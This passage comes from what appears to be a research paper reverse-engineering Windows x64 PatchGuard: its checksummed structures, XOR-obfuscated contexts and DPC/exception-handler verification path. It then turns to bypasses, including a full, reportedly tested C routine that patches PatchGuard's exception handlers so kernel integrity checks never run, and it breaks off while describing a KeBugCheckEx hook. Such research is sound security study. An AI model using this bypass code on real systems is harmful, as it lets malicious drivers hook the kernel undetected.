|
|
Checksum = RotateLeft(Checksum, Context->RandomHashRotateBits);
|
|
BaseAddress++;
|
|
}
|
|
|
|
Checksum32 = (ULONG)Checksum;
|
|
|
|
Checksum >>= 31;
|
|
|
|
do
|
|
{
|
|
Checksum32 ^= (ULONG)Checksum;
|
|
Checksum >>= 31;
|
|
} while (Checksum);
|
|
|
|
|
|
The end result is that Checksum32 holds the checksum of the block which
|
|
is subsequently stored in the Checksum attribute of the checksum state
|
|
structure along with the original block size and block base address that
|
|
were passed to the function.
|
|
|
|
For the purpose of initializing the checksum of image sections,
|
|
nt!PgCreateImageSubContext calls into nt!PgCreateImageSectionSubContext
|
|
which is prototyped as:
|
|
|
|
|
|
PPATCHGUARD_SUB_CONTEXT PgCreateImageSectionSubContext(
|
|
IN PPATCHGUARD_CONTEXT ParentContext,
|
|
IN PVOID SymbolAddress,
|
|
IN ULONG SubContextSize,
|
|
IN PVOID ImageBase);
|
|
|
|
|
|
This routine first checks to see if nt!KiOpPrefetchPatchCount is zero.
|
|
If it is not, a block checksum context is created that does not cover
|
|
all of the sections in the image. This could presumably be related to
|
|
detecting whether or not hot patches have been applied, but this has not
|
|
been confirmed. Otherwise, the function appears to enumerate the various
|
|
sections included in the supplied image, calculating the checksum across
|
|
each. It appears to exclude checksums of sections named INIT, PAGEVRFY,
|
|
PAGESPEC, and PAGEKD.
|
|
|
|
To account for an image's Import Address Table and Import Directory,
|
|
nt!PgCreateImageSubContext calls nt!PgCreateBlockChecksumSubContext on
|
|
the directory entries for both, but only if the directory entries exist
|
|
and are valid for the supplied image.
|
|
|
|
3.2.2) GDT/IDT
|
|
|
|
|
|
The protection of the Global Descriptor Table (GDT) and the Interrupt
|
|
Descriptor Table (IDT) is another important feature of PatchGuard. The
|
|
GDT is used to describe memory segments that are used by the kernel. It
|
|
is especially lucrative to malicious applications due to the fact that
|
|
modifying certain key GDT entries could lead to non-privileged,
|
|
user-mode applications being able to modify kernel memory. The IDT is
|
|
also useful, both in a malicious context and in a legitimate context.
|
|
In some cases, third parties may wish to intercept certain hardware or
|
|
software interrupts before passing it off to the kernel. Unless done
|
|
right, hooking IDT entries can be very dangerous due to the
|
|
considerations that have to be made when running in the context of an
|
|
interrupt request handler.
|
|
|
|
The actual implementation of GDT/IDT protection is accomplished through
|
|
the use of the nt!PgCreateBlockChecksumSubContext function which is
|
|
passed the contents of both descriptor tables. Since the registers that
|
|
hold the GDT and IDT are relative to a given processor, PatchGuard
|
|
creates a separate context for each table on each individual processor.
|
|
To obtain the address of the GDT and the IDT for a given processor,
|
|
PatchGuard first uses nt!KeSetAffinityThread to ensure that it's running
|
|
on a specific processor. After that, it makes a call to nt!KiGetGdtIdt
|
|
which stores the GDT and the IDT base addresses as output parameters as
|
|
shown in the prototype below:
|
|
|
|
|
|
VOID KiGetGdtIdt(
|
|
OUT PVOID *Gdt,
|
|
OUT PVOID *Idt);
|
|
|
|
|
|
The actual protection of the GDT and the IDT is done in the context of
|
|
two separate functions that have been labeled nt!PgCreateGdtSubContext
|
|
and PgCreateIdtSubContext. These routines are prototyped as shown
|
|
below:
|
|
|
|
|
|
PPATCHGUARD_SUB_CONTEXT PgCreateGdtSubContext(
|
|
IN PPATCHGUARD_CONTEXT ParentContext,
|
|
IN UCHAR ProcessorNumber);
|
|
|
|
|
|
PPATCHGUARD_SUB_CONTEXT PgCreateIdtSubContext(
|
|
IN PPATCHGUARD_CONTEXT ParentContext,
|
|
IN UCHAR ProcessorNumber);
|
|
|
|
|
|
Both routines are called in the context of a loop that iterates across
|
|
all of the processors on the machine with respect to
|
|
nt!KeNumberProcessors.
|
|
|
|
3.2.3) SSDT
|
|
|
|
|
|
One of the areas most notorious for being hooked by third-party drivers
|
|
is the System Service Descriptor Table, also known as the SSDT. This
|
|
table contains information about the service tables that are used by the
|
|
operating for dispatching system calls. On Windows x64 kernels,
|
|
nt!KeServiceDescriptorTable conveys the address of the actual dispatch
|
|
table and the number of entries in the dispatch table for the native
|
|
system call interface. In this case, the actual dispatch table is
|
|
stored as an array of relative offsets in nt!KiServiceTable. The
|
|
offsets are relative to the array itself using relative addressing. To
|
|
obtain the absolute address of system service routines, the following
|
|
approach can be used:
|
|
|
|
|
|
lkd> u dwo(nt!KiServiceTable)+nt!KiServiceTable L1
|
|
nt!NtMapUserPhysicalPagesScatter:
|
|
fffff800`013728b0 488bc4 mov rax,rsp
|
|
lkd> u dwo(nt!KiServiceTable+4)+nt!KiServiceTable L1
|
|
nt!NtWaitForSingleObject:
|
|
fffff800`012b83a0 4c89442418 mov [rsp+0x18],r8
|
|
|
|
|
|
The fact that the dispatch table now contains an array of relative
|
|
addresses is one hurdle that driver developers who intend to port system
|
|
call hooking code from 32-bit platforms to the x64 kernel will have to
|
|
overcome. One solution to the relative address problem is fairly
|
|
simple. There are plenty of places within the 2 GB of relative
|
|
addressable memory that a trampoline could be placed for a hook routine.
|
|
For instance, there is often alignment padding between symbols. This
|
|
approach is rather hackish and it depends on the fact that PatchGuard is
|
|
forcibly disabled. However, there are also other, more elegant
|
|
approaches to accomplishing this that require neither.
|
|
|
|
As far as protecting the system service table is concerned, PatchGuard
|
|
protects both the native system service dispatch table stored in
|
|
nt!KiServiceTable as well as the nt!KeServiceDescriptorTable structure
|
|
itself. This is done by making use of the
|
|
nt!PgCreateBlockChecksumSubContext routine that was mentioned in the
|
|
section on system images (). The following code shows how the block
|
|
checksum routine is called for both items:
|
|
|
|
|
|
PgCreateBlockChecksumSubContext(
|
|
ParentContext,
|
|
0,
|
|
KeServiceDescriptorTable->DispatchTable, // KiServiceTable
|
|
KiServiceLimit * sizeof(ULONG),
|
|
0,
|
|
NULL);
|
|
|
|
PgCreateBlockChecksumSubContext(
|
|
ParentContext,
|
|
0,
|
|
&KeServiceDescriptorTable,
|
|
0x20,
|
|
0,
|
|
NULL);
|
|
|
|
|
|
The reason the nt!KeServiceDescriptorTable structure is also
|
|
protected is to prevent the modification of the attribute that
|
|
points to the actual dispatch table.
|
|
|
|
3.2.4) Processor MSRs
|
|
|
|
|
|
The latest and greatest processors have greatly improved the methods
|
|
through which user-mode to kernel-mode transitions are accomplished.
|
|
Prior to these enhancements, most operating systems, including Windows,
|
|
were forced to dedicate a soft-interrupt for exclusive use as a system
|
|
call vector. Newer processors have a dedicated instruction set for
|
|
dispatching system calls, such as the syscall and sysenter instructions.
|
|
Part of the way in which these instructions work is by taking advantage
|
|
of a processor-defined model-specific register (MSR) that contains the
|
|
address of the routine that is intended to gain control in kernel-mode
|
|
when a system call is received. On the x64 architecture, the MSR that
|
|
controls this value is named LSTAR which is short for Long System
|
|
Target-Address Register. The code associated with this MSR is
|
|
0xc0000082. During boot, the x64 kernel initializes this MSR to
|
|
nt!KiSystemCall64.
|
|
|
|
|
|
In order for Microsoft to prevent third parties from hooking system
|
|
calls by changing the value of the LSTAR MSR, PatchGuard creates a
|
|
protection sub-context of type 7 in order to cache the value of the MSR.
|
|
The routine that is responsible for accomplishing this has been labeled
|
|
PgCreateMsrSubContext and its prototype is shown below:
|
|
|
|
|
|
PPATCHGUARD_SUB_CONTEXT PgCreateMsrSubContext(
|
|
IN PPATCHGUARD_CONTEXT ParentContext,
|
|
IN UCHAR Processor);
|
|
|
|
|
|
Like the GDT/IDT protection, the LSTAR MSR value must be obtained on a
|
|
per-processor basis since MSR values are inherently stored on individual
|
|
processors. To support this, the routine is called in the context of a
|
|
loop through all of the processors and is passed the processor
|
|
identifier that it is to read from. In order to ensure that the MSR
|
|
value is obtained from the right processor, PatchGuard makes use of
|
|
nt!KeSetAffinityThread to cause the calling thread to run on the
|
|
appropriate processor.
|
|
|
|
3.2.5) Debug Routines
|
|
|
|
|
|
PatchGuard creates a special sub-context (type 6), that is used to
|
|
protect some internal routines that are used for debugging purposes by
|
|
the kernel. These routines, such as nt!KdpStub, are intended to be used
|
|
as a mechanism by which an attached debugger can handle an exception
|
|
prior to allowing the kernel to dispatch it. bt!KdpStub is called
|
|
indirectly through the nt!KiDebugRoutine global variable from
|
|
nt!KiDispatchException. The routine that initializes the protection
|
|
sub-context for these routines has been labeled
|
|
nt!PgCreateDebugRoutineSubContext and is prototyped as shown below:
|
|
|
|
|
|
PPATCHGUARD_SUB_CONTEXT PgCreateDebugRoutineSubContext(
|
|
IN PPATCHGUARD_CONTEXT ParentContext);
|
|
|
|
|
|
It appears that the sub-context structure is initialized with pointers
|
|
to nt!KdpStub, nt!KdpTrap, and nt!KiDebugRoutine. It seems that this
|
|
sub-context is intended to protect from a third-party driver modifying
|
|
the nt!KiDebugRoutine to point elsewhere. There may be other intentions
|
|
as well.
|
|
|
|
3.3) Obfuscating the PatchGuard Contexts
|
|
|
|
|
|
In order to make it more challenging to locate the PatchGuard contexts
|
|
in memory, each context is XOR'd with a randomly generated 64-bit key.
|
|
This is accomplished by calling the function that has been labeled
|
|
nt!PgEncryptContext that inline XOR's the supplied context buffer and
|
|
then returns the XOR key that was used to encrypt it. This function is
|
|
prototyped as shown below:
|
|
|
|
|
|
ULONG64 PgEncryptContext(
|
|
IN OUT PPATCHGUARD_CONTEXT Context);
|
|
|
|
|
|
After nt!KiInitializePatchGuard has initialized all of the individual
|
|
sub-contexts, the next thing that it does is encrypt the primary
|
|
PatchGuard context. To accomplish this, it first makes a copy of the
|
|
context on the stack so that it can be referenced in plain-text after
|
|
being encrypted. The reason the plain-text copy is needed is so that
|
|
the verification routine can be queued for execution, and in order to do
|
|
that it is necessary to reference some of the attributes of the context
|
|
structure. This is discussed more in the following section. After the
|
|
copy has been created, a call is made to nt!PgEncryptContext passing the
|
|
primary PatchGuard context as the first argument. Once the verification
|
|
routine has been queued for execution, the plain-text copy is no longer
|
|
needed and is set back to zero in order to ensure that no reference is
|
|
left in the clear. The pseudo code below illustrates this behavior:
|
|
|
|
|
|
PATCHGUARD_CONTEXT LocalCopy;
|
|
ULONG64 XorKey;
|
|
|
|
memmove(
|
|
&LocalCopy,
|
|
Context,
|
|
sizeof(PATCHGUARD_CONTEXT)); // 0x1b8
|
|
|
|
XorKey = PgEncryptContext(
|
|
Context);
|
|
|
|
... Use LocalCopy for verification routine queuing ...
|
|
|
|
memset(
|
|
&LocalCopy,
|
|
0,
|
|
sizeof(LocalCopy));
|
|
|
|
|
|
3.4) Executing the PatchGuard Verification Routine
|
|
|
|
|
|
Gathering the checksums and caching critical structure values is great,
|
|
but it means absolutely nothing if there is no means by which it can be
|
|
validated. To that effect, PatchGuard goes to great lengths to make the
|
|
execution of the validation routine as covert as possible. This is
|
|
accomplished through the use of misdirection and obfuscation.
|
|
|
|
After all of the sub-contexts have been initialized, but prior to
|
|
encrypting the primary context, nt!KiInitializePatchGuard performs one
|
|
of its more critical operations. In this phase, the routine that will
|
|
be indirectly used to handle the PatchGuard verification is selected at
|
|
random from an array of function pointers and is stored at offset 0x168
|
|
in the primary PatchGuard context. The functions found within the array
|
|
have a very special purpose that will be discussed in more detail later
|
|
in this section. For now, earmark the fact that a verification routine
|
|
has been selected.
|
|
|
|
Following the selection of a verification routine, the primary
|
|
PatchGuard context is encrypted as described in the previous section.
|
|
After the encryption completes, a timer is initialized that makes use of
|
|
a sub-context that was allocated early on in the PatchGuard
|
|
initialization process by nt!KiInitializePatchGuard. The timer is
|
|
initialized through a call to nt!KeInitializeTimer where the pointer to
|
|
the timer structure that is passed in is actually part of the
|
|
sub-context structure allocated earlier. Immediately following the
|
|
initialized timer structure in memory at offset 0x88 is the word value
|
|
0x1131. When disassembled, these two bytes translate to a xor [rcx], edx
|
|
instruction. If one looks closely at the first two bytes of
|
|
nt!CmpAppendDllSection, one will see that its first instruction is
|
|
composed of exactly those two bytes. Though not important at this
|
|
juncture, it may be of use later.
|
|
|
|
With the timer structure initialized, PatchGuard begins the process
|
|
of queuing the timer for execution by calling a function that has been
|
|
labeled nt!PgInitializeTimer which is prototyped as shown below:
|
|
|
|
|
|
VOID PgInitializeTimer(
|
|
IN PPATCHGUARD_CONTEXT Context,
|
|
IN PVOID EncryptedContext,
|
|
IN ULONG64 XorKey,
|
|
IN ULONG UnknownZero);
|
|
|
|
|
|
Inside the nt!PgInitializeTimer routine, a few strange things occur.
|
|
First, a DPC is initialized that uses the randomly selected verification
|
|
routine described earlier in this section as the DeferredRoutine. The
|
|
EncryptedContext pointer that is passed in as an argument is then XOR'd
|
|
with the XorKey argument to produce a completely bogus pointer that is
|
|
passed as the DeferredContext argument to nt!KeInitializeDpc. The end
|
|
result is pseudo-code that looks something like this:
|
|
|
|
|
|
KeInitializeDpc(
|
|
&Dpc,
|
|
Context->TimerDpcRoutine,
|
|
EncryptedContext ^ ~(XorKey << UnknownZero));
|
|
|
|
|
|
After the DPC has been initialized, a call is made to nt!KeSetTimer that
|
|
queues the DPC for execution. The DueTime argument is randomly
|
|
generated as to make it harder to signature with a defined upper bound
|
|
in order to ensure that it is executed within a reasonable time frame.
|
|
After setting the timer, nt!PgInitializeTimer returns to the caller.
|
|
|
|
With the timer initialized and set to execute, nt!KiInitializePatchGuard
|
|
has completed its operation and returns to nt!KiFilterFiberContext. The
|
|
divide error fault that caused the whole initialization process to start
|
|
is corrected and execution is restored back to the instruction following
|
|
the div in nt!KiDivide6432, thus allowing the kernel to boot as normal.
|
|
|
|
That's only half of the fun, though. The real question now is how the
|
|
validation routine gets executed. It seems obvious that it's related to
|
|
the DPC routine that was used when the timer was set, so the most
|
|
logical place to look is there. Recalling from earlier in this section,
|
|
nt!KiInitializePatchGuard selected a validation routine address from an
|
|
array of routines at random. This array is found by looking at this
|
|
disassembly from the PatchGuard initialization routine:
|
|
|
|
|
|
nt!KiDivide6432+0xec3:
|
|
fffff800`01423e74 8bc1 mov eax,ecx
|
|
fffff800`01423e76 488d0d83c1bdff lea rcx,[nt]
|
|
fffff800`01423e7d 488b84c128044300 mov rax,[rcx+rax*8+0x430428]
|
|
|
|
|
|
Again, the same obfuscation technique that was used to hide the pool tag
|
|
array is used here. By adding 0x430428 to the base address of nt, the
|
|
array of DPC routines is revealed:
|
|
|
|
|
|
lkd> dqs nt+0x430428 L3
|
|
fffff800`01430428 fffff800`01033b10 nt!KiScanReadyQueues
|
|
fffff800`01430430 fffff800`011010e0 nt!ExpTimeRefreshDpcRoutine
|
|
fffff800`01430438 fffff800`0101dd10 nt!ExpTimeZoneDpcRoutine
|
|
|
|
|
|
This tells us the possible permutations for DPC routines that PatchGuard
|
|
may use, but it doesn't tell us how this actually leads to the
|
|
validation of the protection contexts. Logically, the next step is to
|
|
attempt to understand how one of these routines operates based on the
|
|
DeferredContext that is passed to is since it is known, from
|
|
nt!PgInitializeTimer, that the DeferredContext argument will point to
|
|
the PatchGuard context XOR'd with an encryption key. Of the three,
|
|
routines, nt!ExpTimeRefreshDpcRoutine is the easiest to understand. The
|
|
disassembly of the first few instructions of this function is shown
|
|
below:
|
|
|
|
|
|
lkd> u nt!ExpTimeRefreshDpcRoutine
|
|
nt!ExpTimeRefreshDpcRoutine:
|
|
fffff800`011010e0 48894c2408 mov [rsp+0x8],rcx
|
|
fffff800`011010e5 4883ec68 sub rsp,0x68
|
|
fffff800`011010e9 b801000000 mov eax,0x1
|
|
fffff800`011010ee 0fc102 xadd [rdx],eax
|
|
fffff800`011010f1 ffc0 inc eax
|
|
fffff800`011010f3 83f801 cmp eax,0x1
|
|
|
|
|
|
Deferred routines are prototyped as taking a pointer to the DPC that
|
|
they are associated with as the first argument and the DeferredContext
|
|
pointer as the second argument. The x64 calling convention tells us
|
|
that this would equate to rcx pointing to the DPC structure and rdx
|
|
pointing to the DeferredContext pointer. There's a problem though. The
|
|
fourth instruction of the function attempts to perform an xadd on the
|
|
first portion of the DeferredContext. As was stated earlier, the
|
|
DeferredContext that is passed to the DPC routine is the result of an
|
|
XOR operation with a pointer which products a completely bogus pointer.
|
|
This should mean that the box would crash immediately upon
|
|
de-referencing the pointer, right? It's obvious that the answer is no,
|
|
and it's here that another case of misdirection is seen.
|
|
|
|
The fact of the matter is that nt!ExpTimeRefreshDpcRoutine,
|
|
nt!ExpTimeZoneDpcRoutine, and nt!KiScanReadyQueues are all perfectly
|
|
legitimate routines that have nothing directly to do with PatchGuard at
|
|
all. Instead, they are used as an indirect means of executing the code
|
|
that does have something to do with PatchGuard. The unique thing about
|
|
these three routines is that they all three de-reference their
|
|
DeferredContext pointer at some point as shown below:
|
|
|
|
|
|
lkd> u fffff800`01033b43 L1
|
|
nt!KiScanReadyQueues+0x33:
|
|
fffff800`01033b43 8b02 mov eax,[rdx]
|
|
lkd> u fffff800`0101dd1e L1
|
|
nt!ExpTimeZoneDpcRoutine+0xe:
|
|
fffff800`0101dd1e 0fc102 xadd [rdx],eax
|
|
|
|
|
|
When the DeferredContext operation occurs a General Protection Fault
|
|
exception is raised and is passed on to nt!KiGeneralProtectionFault.
|
|
This routine then eventually leads to the execution of the exception
|
|
handler that is associated with the routine that triggered the fault,
|
|
such as nt!ExpTimeRefreshDpcRoutine. On x64, the exception handling
|
|
code is completely different than what most people are used to on
|
|
32-bit. Rather than functions registering exception handlers at runtime,
|
|
each function specifies its exception handlers at compile time in a way
|
|
that allows them to be looked up through a standardize API routine, like
|
|
nt!RtlLookupFunctionEntry. This API routine returns information about
|
|
the function in the RUNTIMEFUNCTION structure which most importantly
|
|
includes unwind information. The unwind information includes the
|
|
address of the exception handler, if any. While this is mostly outside
|
|
of the scope of this document, one can determine the address of
|
|
nt!ExpTimeRefreshDpcRoutine's exception handler by doing the following
|
|
in the debugger:
|
|
|
|
|
|
lkd> .fnent nt!ExpTimeRefreshDpcRoutine
|
|
Debugger function entry 00000000`01cdaa4c for:
|
|
(fffff800`011010e0) nt!ExpTimeRefreshDpcRoutine |
|
|
(fffff800`011011d0) nt!ExpCenturyDpcRoutine
|
|
Exact matches:
|
|
nt!ExpTimeRefreshDpcRoutine = <no type information>
|
|
|
|
BeginAddress = 00000000`001010e0
|
|
EndAddress = 00000000`0010110d
|
|
UnwindInfoAddress = 00000000`00131274
|
|
lkd> u nt + dwo(nt + 00131277 + (by(nt + 00131276) * 2) + 13)
|
|
nt!ExpTimeRefreshDpcRoutine+0x40:
|
|
fffff800`01101120 8bc0 mov eax,eax
|
|
fffff800`01101122 55 push rbp
|
|
fffff800`01101123 4883ec30 sub rsp,0x30
|
|
fffff800`01101127 488bea mov rbp,rdx
|
|
fffff800`0110112a 48894d50 mov [rbp+0x50],rcx
|
|
|
|
|
|
Looking more closely at this exception handler, it can be seen that it
|
|
issues a call to nt!KeBugCheckEx under a certain condition with bug
|
|
check code 0x109. This bug check code is what is used by PatchGuard to
|
|
indicate that a critical structure has been tampered with, so this is a
|
|
very good indication that this exception handler is at least either in
|
|
whole, or in part, associated with PatchGuard.
|
|
|
|
The exception handlers for each of the three routines are roughly
|
|
equivalent and perform the same operations. If the DeferredContext has
|
|
not been tampered with unexpectedly then the exception handlers
|
|
eventually call into the protection context's copy of the code from
|
|
INITKDB, specifically the nt!FsRtlUninitializeSmallMcb. This routine
|
|
calls into the symbol named nt!FsRtlMdlReadCompleteDevEx which is
|
|
actually what is responsible for calling the various sub-context
|
|
verification routines.
|
|
|
|
3.5) Reporting Verification Inconsistencies
|
|
|
|
|
|
In the event that PatchGuard detects that a critical structure has been
|
|
modified, it calls the code-copy version of the symbol named
|
|
nt!SdpCheckDll with parameters that will be subsequently passed to
|
|
nt!KeBugCheckEx via the function table stored in the PatchGuard context.
|
|
The purpose of nt!SdbpCheckDll is to zero out the stack and all of the
|
|
registers prior to the current frame before jumping to nt!KeBugCheckEx.
|
|
This is presumably done to attempt to make it impossible for a
|
|
third-party driver to detect and recover from the bug check report. If
|
|
all of the checks go as planned and there are no inconsistencies, the
|
|
routine creates a new PatchGuard context and sets the timer again using
|
|
the same routine that was selected the first time.
|
|
|
|
4) Bypass Approaches
|
|
|
|
|
|
With the most critical aspects of how PatchGuard operates explained, the
|
|
next goal is to attempt to see if there are any ways in which the
|
|
protection mechanisms offered by it can be bypassed. This would entail
|
|
either disabling or tricking the validation routine. While there are
|
|
many obvious approaches, such as the creation of a custom boot loader
|
|
that runs prior to PatchGuard initializing, or through the modification
|
|
of ntoskrnl.exe to completely exclude the initialization vector, the
|
|
approaches discussed in this chapter are intended to be usable in a
|
|
real-world environment without having to resort to intrusive operations
|
|
and without requiring a reboot of the machine. In fact, the primary goal
|
|
is to create a single standalone function, or a few functions, that can
|
|
be dropped into device drivers in a manner that allows them to just call
|
|
one routine to disable the PatchGuard protections so that the driver's
|
|
existing approaches for hooking critical structures can still be used.
|
|
|
|
It is important to note that some of the approaches listed here have not
|
|
been tested and are simply theoretical. The ones that have been tested
|
|
will be indicated as such. Prior to diving into the particular bypass
|
|
approaches, though, it is also important to consider general techniques
|
|
for disabling PatchGuard on the fly. First, one must consider how the
|
|
validation routine is set up to run and what it depends on to accomplish
|
|
validation. In this case, the validation routine is set to run in the
|
|
context of a timer that is associated with a DPC that runs from a system
|
|
worker thread that eventually leads to the calling of an exception
|
|
handler. The DPC routine that is used is randomly selected from a small
|
|
pool of functions and the timer object is assigned a random DueTime in
|
|
an effort to make it harder to detect.
|
|
|
|
Aside from the validation vector, it is also known that when PatchGuard
|
|
encounters an inconsistency it will call nt!KeBugCheckEx with a specific
|
|
bug check code in an attempt to crash the system. These tidbits of
|
|
understanding make it possible to consider a wide range of bypass
|
|
approaches.
|
|
|
|
4.1) Exception Handler Hooking
|
|
|
|
|
|
Since it is known that the validation routines indirectly depend on the
|
|
exception handlers associated with the three timer DPC routines to run
|
|
code, it stands to reason that it may be possible to change the behavior
|
|
of each exception handler to simply become a no-operation. This would
|
|
mean that once the DPC routine executes and triggers the general
|
|
protection fault, the exception handler will get called and will simply
|
|
perform no operation rather than doing the validation checks. This
|
|
approach has been tested and has been confirmed to work on the current
|
|
implementation of PatchGuard.
|
|
|
|
The approach taken to accomplish this is to first find the list of
|
|
routines that are known to be associated with PatchGuard. As it stands
|
|
today, the list only contains three functions, but it may be the case
|
|
that the list will change in the future. After locating the array of
|
|
routines, each routine's exception handler must be extracted and then
|
|
subsequently patched to return 0x1 and then return. An example function
|
|
that implements this algorithm can be found below:
|
|
|
|
|
|
static CHAR CurrentFakePoolTagArray[] =
|
|
"AcpSFileIpFIIrp MutaNtFsNtrfSemaTCPc";
|
|
|
|
NTSTATUS DisablePatchGuard() {
|
|
UNICODE_STRING SymbolName;
|
|
NTSTATUS Status = STATUS_SUCCESS;
|
|
PVOID * DpcRoutines = NULL;
|
|
PCHAR NtBaseAddress = NULL;
|
|
ULONG Offset;
|
|
|
|
RtlInitUnicodeString(
|
|
&SymbolName,
|
|
L"__C_specific_handler");
|
|
|
|
do
|
|
{
|
|
//
|
|
// Get the base address of nt
|
|
//
|
|
if (!RtlPcToFileHeader(
|
|
MmGetSystemRoutineAddress(&SymbolName),
|
|
(PCHAR *)&NtBaseAddress))
|
|
{
|
|
Status = STATUS_INVALID_IMAGE_FORMAT;
|
|
break;
|
|
}
|
|
|
|
//
|
|
// Search the image to find the first occurrence of:
|
|
//
|
|
// "AcpSFileIpFIIrp MutaNtFsNtrfSemaTCPc"
|
|
//
|
|
// This is the fake tag pool array that is used to allocate protection
|
|
// contexts.
|
|
//
|
|
__try
|
|
{
|
|
for (Offset = 0;
|
|
!DpcRoutines;
|
|
Offset += 4)
|
|
{
|
|
//
|
|
// If we find a match for the fake pool tag array, the DPC routine
|
|
// addresses will immediately follow.
|
|
//
|
|
if (memcmp(
|
|
NtBaseAddress + Offset,
|
|
CurrentFakePoolTagArray,
|
|
sizeof(CurrentFakePoolTagArray) - 1) == 0)
|
|
DpcRoutines = (PVOID *)(NtBaseAddress +
|
|
Offset + sizeof(CurrentFakePoolTagArray) + 3);
|
|
}
|
|
|
|
} __except(EXCEPTION_EXECUTE_HANDLER)
|
|
{
|
|
//
|
|
// If an exception occurs, we failed to find it. Time to bail out.
|
|
//
|
|
Status = GetExceptionCode();
|
|
break;
|
|
}
|
|
|
|
DebugPrint(("DPC routine array found at %p.",
|
|
DpcRoutines));
|
|
|
|
//
|
|
// Walk the DPC routine array.
|
|
//
|
|
for (Offset = 0;
|
|
DpcRoutines[Offset] && NT_SUCCESS(Status);
|
|
Offset++)
|
|
{
|
|
PRUNTIME_FUNCTION Function;
|
|
ULONG64 ImageBase;
|
|
PCHAR UnwindBuffer;
|
|
UCHAR CodeCount;
|
|
ULONG HandlerOffset;
|
|
PCHAR HandlerAddress;
|
|
PVOID LockedAddress;
|
|
PMDL Mdl;
|
|
|
|
//
|
|
// If we find no function entry, then go on to the next entry.
|
|
//
|
|
if ((!(Function = RtlLookupFunctionEntry(
|
|
(ULONG64)DpcRoutines[Offset],
|
|
&ImageBase,
|
|
NULL))) ||
|
|
(!Function->UnwindData))
|
|
{
|
|
Status = STATUS_INVALID_IMAGE_FORMAT;
|
|
continue;
|
|
}
|
|
|
|
//
|
|
// Grab the unwind exception handler address if we're able to find one.
|
|
//
|
|
UnwindBuffer = (PCHAR)(ImageBase + Function->UnwindData);
|
|
CodeCount = UnwindBuffer[2];
|
|
|
|
//
|
|
// The handler offset is found within the unwind data that is specific
|
|
// to the language in question. Specifically, it's +0x10 bytes into
|
|
// the structure not including the UNWIND_INFO structure itself and any
|
|
// embedded codes (including padding). The calculation below accounts
|
|
// for all these and padding.
|
|
//
|
|
HandlerOffset = *(PULONG)((ULONG64)(UnwindBuffer + 3 + (CodeCount * 2) + 20) & ~3);
|
|
|
|
//
|
|
// Calculate the full address of the handler to patch.
|
|
//
|
|
HandlerAddress = (PCHAR)(ImageBase + HandlerOffset);
|
|
|
|
DebugPrint(("Exception handler for %p found at %p (unwind %p).",
|
|
DpcRoutines[Offset],
|
|
HandlerAddress,
|
|
UnwindBuffer));
|
|
|
|
//
|
|
// Finally, patch the routine to simply return with 1. We'll patch
|
|
// with:
|
|
//
|
|
// 6A01 push byte 0x1
|
|
// 58 pop eax
|
|
// C3 ret
|
|
//
|
|
|
|
//
|
|
// Allocate a memory descriptor for the handler's address.
|
|
//
|
|
if (!(Mdl = MmCreateMdl(
|
|
NULL,
|
|
(PVOID)HandlerAddress,
|
|
4)))
|
|
{
|
|
Status = STATUS_INSUFFICIENT_RESOURCES;
|
|
continue;
|
|
}
|
|
|
|
//
|
|
// Construct the Mdl and map the pages for kernel-mode access.
|
|
//
|
|
MmBuildMdlForNonPagedPool(
|
|
Mdl);
|
|
|
|
if (!(LockedAddress = MmMapLockedPages(
|
|
Mdl,
|
|
KernelMode)))
|
|
{
|
|
IoFreeMdl(
|
|
Mdl);
|
|
|
|
Status = STATUS_ACCESS_VIOLATION;
|
|
continue;
|
|
}
|
|
|
|
//
|
|
// Interlocked exchange the instructions we're overwriting with.
|
|
//
|
|
InterlockedExchange(
|
|
(PLONG)LockedAddress,
|
|
0xc358016a);
|
|
|
|
//
|
|
// Unmap and destroy the MDL
|
|
//
|
|
MmUnmapLockedPages(
|
|
LockedAddress,
|
|
Mdl);
|
|
|
|
IoFreeMdl(
|
|
Mdl);
|
|
}
|
|
|
|
} while (0);
|
|
|
|
return Status;
|
|
}
|
|
|
|
|
|
The benefits of this approach include the fact that it is small and
|
|
relatively simplistic. It is also quite fault tolerant in the event
|
|
that something changes. However, some of the cons include the fact that
|
|
it depends on the pool tag array being situated immediately prior to the
|
|
array of DPC routine addresses and it furthermore depends on the pool
|
|
tag array being a fixed value. It's perfectly within the realm of
|
|
possibility that Microsoft will eliminate this assumption in the future.
|
|
For these reasons, it would be better to not use this approach in a
|
|
production driver, but it is at least suitable enough for a
|
|
demonstration.
|
|
|
|
In order for Microsoft to break this approach they would have to make
|
|
some of the assumptions made by it unreliable. For instance, the array
|
|
of DPC routines could be moved to a location that is not immediately
|
|
after the array of pool tags. This would mean that the routine would
|
|
have to hardcode or otherwise derive the array of DPC routines used by
|
|
PatchGuard. Another option would be to split the pool tag array out
|
|
such that it isn't a condensed string that can be easily searched for.
|
|
In reality, the relative level of complexities involved in preventing
|
|
this approach from being reliable to implement are quite small.
|
|
|
|
4.2) KeBugCheckEx Hook
|
|
|
|
|
|
One of the unavoidable facts of PatchGuard's protection is that it has
|
|
to report validation inconsistencies in some manner. In fact, the
|
|
manner in which it reports it has to entail shutting down the machine in
|
|
order to prevent third-party vendors from being able to continue running
|
|
code even after a patch has been detected. As it stands right now, the
|
|
approach taken to accomplish this is to issue a bug check with the
|
|
symbolic code of 0x109 via nt!KeBugCheckEx. This route was taken so that
|
|
the end-user would be aware of what had occurred and not be left in the
|
|
dark, literally, if their machine were to all of the sudden shut off or
|
|
reboot without any word of explanation.
|
|
|
|
The first idea the authors had when thinking about bypass techniques was
|
|
to attempt to have nt!KeBugCheckEx return to the caller's caller frame.
|
|
This would be necessary because you cannot return to the caller since
|
|
the compiler generally inserts a debugger trap immediately after calls
|
|
to nt!KeBugCheckEx. However, it may have been possible to return to the
|
|
frame of the caller's caller. In other words, the routine that called
|
|
the function that lead to nt!KeBugCheckEx being called. However, as
|
|
described earlier in this document, the PatchGuard code takes care to
|
|
ensure that the stack is zeroed out prior to calling nt!KeBugCheckEx.
|
|
This effectively eliminates any contextual references that might be used
|
|
on the stack for the purpose of returning to parent frames. As such,
|
|
the nt!KeBugCheckEx hook vector might seem like a dead-end. Quite the
|
|
contrary, it's not.
|
|
|
|
A derivative approach that can be taken without having to worry
|
|
about context stored in registers or on the stack is to take advantage
|
|
of the fact that each thread retains the address of its own entry point.
|
|
For system worker threads, the entry point will typically point to a
|
|
routine like nt!ExpWorkerThread. Since multiple worker threads are
|
|
spawned, the context parameter passed to the thread is irrelevant as the
|
|
worker threads are really only being used to process work items and
|
|
expire DPC routines. With this fact in mind, the approach boils down to
|
|
hooking nt!KeBugCheckEx and detecting whether or not bug check code
|
|
0x109 has been passed. If it has not, the original nt!KeBugCheckEx
|
|
